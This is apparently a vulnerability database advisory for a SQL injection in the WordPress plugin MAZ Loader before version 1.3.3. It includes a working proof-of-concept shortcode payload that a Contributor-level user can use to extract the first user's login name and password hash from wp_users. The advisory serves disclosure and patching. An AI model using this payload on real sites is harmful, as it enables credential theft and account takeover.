Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitApple502jWPEX-ID:B97AFBE8-C9AE-40A2-81E5-B1D7A6B31831
HistoryOct 11, 2021 - 12:00 a.m.

MAZ Loader < 1.3.3 - Contributor+ SQL Injection

2021-10-1100:00:00
apple502j
353
maz loader
sql injection
contributor
admin
user login
password hash
vulnerability

EPSS

0.001

Percentile

37.1%

JSON

The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.

As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).

[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('Iiwic2l6ZSI6MTAwLCJiYWNrZ3JvdW5kIjoiIiwiY29sb3IiOiIiLCJwYWRkaW5nX3RvcCI6MCwicGFkZGluZ19yaWdodCI6MCwicGFkZGluZ19ib3R0b20iOjAsInBhZGRpbmdfbGVmdCI6MCwicGFkZGluZ19saW5rIjoiYWxsIiwicGFkZGluZ190eXBlIjoicHgiLCJtYXJnaW5fdG9wIjowLCJtYXJnaW5fcmlnaHQiOjAsIm1hcmdpbl9ib3R0b20iOjAsIm1hcmdpbl9sZWZ0IjowLCJtYXJnaW5fbGluayI6ImFsbCIsIm1hcmdpbl90eXBlIjoicHgifX0sInNldHRpbmdzIjp7Im1pbmltdW1fbG9hZGluZ190aW1lIjoyMDAwLCJkdXJhdGlvbiI6MTAwMCwiZGVsYXkiOjAsInNob3dfb25faG9tZXBhZ2UiOiJvZmYifSwiYXBwZWFyYW5jZSI6eyJiYWNrZ3JvdW5kX2NvbG9yIjoiI2RkOTkzMyIsImJhY2tncm91bmQiOiIiLCJiYWNrZ3JvdW5kX2ltYWdlX3R5cGUiOiJjb3ZlciIsImJhY2tncm91bmRfaW1hZ2VfcG9zaXRpb24iOiJjZW50ZXJfY2VudGVyIiwiYmFja2dyb3VuZF9jb2xvcl9vdmVybGF5IjoiIiwiY29udGVudF9wb3NpdGlvbiI6ImNlbnRlciIsIml0ZW1zX3NpZGVfYnlfc2lkZSI6Im9mZiIsImRpc2FibGVfcGFnZV9zY3JvbGwiOiJvbiJ9LCJjdXN0b21fY29kZSI6IiIsInB1Ymxpc2hfc2V0dGluZ3MiOiIifQ==')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"]

Related

nvd 1
wpvulndb 1
cvelist 1
cve 1
patchstack 1
cnvd 1
prion 1
nvd
nvd
CVE-2021-24669
2021-11-08 18:15:08
wpvulndb
wpvulndb
MAZ Loader < 1.3.3 - Contributor+ SQL Injection
2021-10-11 00:00:00
cvelist
cvelist
CVE-2021-24669 MAZ Loader < 1.3.3 - Contributor+ SQL Injection
2021-11-08 17:34:59
cve
cve
CVE-2021-24669
2021-11-08 18:15:08
patchstack
patchstack
WordPress MAZ Loader plugin <= 1.3.2 - SQL Injection (SQLi) vulnerabilities
2021-10-11 00:00:00
cnvd
cnvd
WordPress Plugin SQL Injection Vulnerability (CNVD-2021-90321)
2021-11-10 00:00:00
prion
prion
Sql injection
2021-11-08 18:15:00

EPSS

0.001

Percentile

37.1%

JSON
Related for WPEX-ID:B97AFBE8-C9AE-40A2-81E5-B1D7A6B31831
nvd1wpvulndb1cvelist1cve1patchstack1cnvd1prion1